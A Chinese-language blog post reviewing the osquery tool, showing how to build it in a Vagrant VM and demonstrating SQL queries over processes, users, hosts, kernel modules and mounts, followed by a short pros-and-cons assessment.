Back to home

OSquery

简介

OSquery 提供了一个统一的操作系统信息查询接口,能够使你忽略系统差异,用SQL获得诸如进程,处理器等基本信息。使得异构的各种信息统一成结构化的表信息。

准备

项目已经提供了Vagrantfile,仅仅只需要执行 vagrant up 就能完成基础设施搭建,然后在虚拟机中尝鲜。

vagrant up centos
vagrant ssh centos

然后执行构建

cd /vagrant
sudo make deps
make
make package

Demo

osquery> .tables
=> bash_history
=> cpuid
=> crontab
=> etc_hosts
=> groups
=> kernel_modules
=> last
=> mounts
=> passwd_changes
=> pci_devices
=> process_envs
=> process_open_files
=> processes
=> routes
=> rpm_packages
=> suid_bin
=> time
=> users

osquery> SELECT * FROM processes LIMIT 5;

+-------------+------+------------+-----+---------+------------+---------------+----------------+-----------+-------------+------------+--------+
| name | path | cmdline | pid | on_disk | wired_size | resident_size | phys_footprint | user_time | system_time | start_time | parent |
+-------------+------+------------+-----+---------+------------+---------------+----------------+-----------+-------------+------------+--------+
| init | | /sbin/init | 1 | -1 | | 1488 | 19232 | 4 | 72 | 1 | 0 |
| kthreadd | | | 2 | -1 | | 0 | 0 | 0 | 2 | 1 | 0 |
| migration/0 | | | 3 | -1 | | 0 | 0 | 0 | 81 | 3 | 2 |
| ksoftirqd/0 | | | 4 | -1 | | 0 | 0 | 0 | 391 | 3 | 2 |
| migration/0 | | | 5 | -1 | | 0 | 0 | 0 | 0 | 3 | 2 |
+-------------+------+------------+-----+---------+------------+---------------+----------------+-----------+-------------+------------+--------+

osquery> SELECT * FROM time;

+------+---------+---------+
| hour | minutes | seconds |
+------+---------+---------+
| 18 | 27 | 54 |
+------+---------+---------+

osquery> SELECT * FROM users LIMIT 5;

+-----+-----+----------+-------------+----------------+---------------+
| uid | gid | username | description | directory | shell |
+-----+-----+----------+-------------+----------------+---------------+
| 0 | 0 | root | root | /root | /bin/bash |
| 1 | 1 | bin | bin | /bin | /sbin/nologin |
| 2 | 2 | daemon | daemon | /sbin | /sbin/nologin |
| 3 | 4 | adm | adm | /var/adm | /sbin/nologin |
| 4 | 7 | lp | lp | /var/spool/lpd | /sbin/nologin |
+-----+-----+----------+-------------+----------------+---------------+

osquery> SELECT * FROM etc_hosts;

+-----------+--------------------------------------------------------------------+
| address | hostnames |
+-----------+--------------------------------------------------------------------+
| 127.0.0.1 | localhost localhost.localdomain localhost4 localhost4.localdomain4 |
| ::1 | localhost localhost.localdomain localhost6 localhost6.localdomain6 |
+-----------+--------------------------------------------------------------------+

osquery> SELECT * FROM kernel_modules LIMIT 5;

+------------+--------+------------------+--------+--------------------+
| name | size | used_by | status | address |
+------------+--------+------------------+--------+--------------------+
| vboxsf | 37631 | - | Live | 0x0000000000000000 |
| ipv6 | 317340 | - | Live | 0x0000000000000000 |
| ppdev | 8537 | - | Live | 0x0000000000000000 |
| parport_pc | 22690 | - | Live | 0x0000000000000000 |
| parport | 36209 | ppdev,parport_pc | Live | 0x0000000000000000 |
+------------+--------+------------------+--------+--------------------+

osquery> SELECT * FROM mounts LIMIT 4;


+----------+-------------+-------+----------+--------------------------------------------------------------+------+--------+------------+---------+-------------+--------------+---
------+-------------+
| fsname   | fsname_real | path  | type     | opts                                                         | freq | passno | block_size | blocks  | blocks_free | blocks_avail | in
odes  | inodes_free |
+----------+-------------+-------+----------+--------------------------------------------------------------+------+--------+------------+---------+-------------+--------------+---
------+-------------+
| rootfs   | rootfs      | /     | rootfs   | rw                                                           | 0    | 0      | 4096       | 9960294 | 9454499     | 8948541      | 25
31328 | 2467810     |
| proc     | proc        | /proc | proc     | rw,relatime                                                  | 0    | 0      | 4096       | 0       | 0           | 0            | 0
      | 0           |
| sysfs    | sysfs       | /sys  | sysfs    | rw,seclabel,relatime                                         | 0    | 0      | 4096       | 0       | 0           | 0            | 0
      | 0           |
| devtmpfs | devtmpfs    | /dev  | devtmpfs | rw,seclabel,relatime,size=1952476k,nr_inodes=488119,mode=755 | 0    | 0      | 4096       | 488119  | 488079      | 488079       | 48
8119  | 487511      |
+----------+-------------+-------+----------+--------------------------------------------------------------+------+--------+------------+---------+-------------+--------------+---
------+-------------+

Pros & Cons

  • Pros :
    • 接口统一
    • 基本文档充分
  • Cons :
    • Cpp project
    • 模块较少,部分内置模块不工作(rpm_packages表查询报错退出)

总结

企业内部监控系统通常都会是case by case,且不会要求应对大部分发行版,通常只需要兼容生产环境运行的系统就行。针对不同的系统指标进行采集,这是一个繁复的过程,但是会帮助你理解你的应用。这个Project对MacOSX表现了极大的兼容,对Mac开发环境友善。统一的接口以及大公司的号召也许会带来社区响应,只是目前看上去还不够。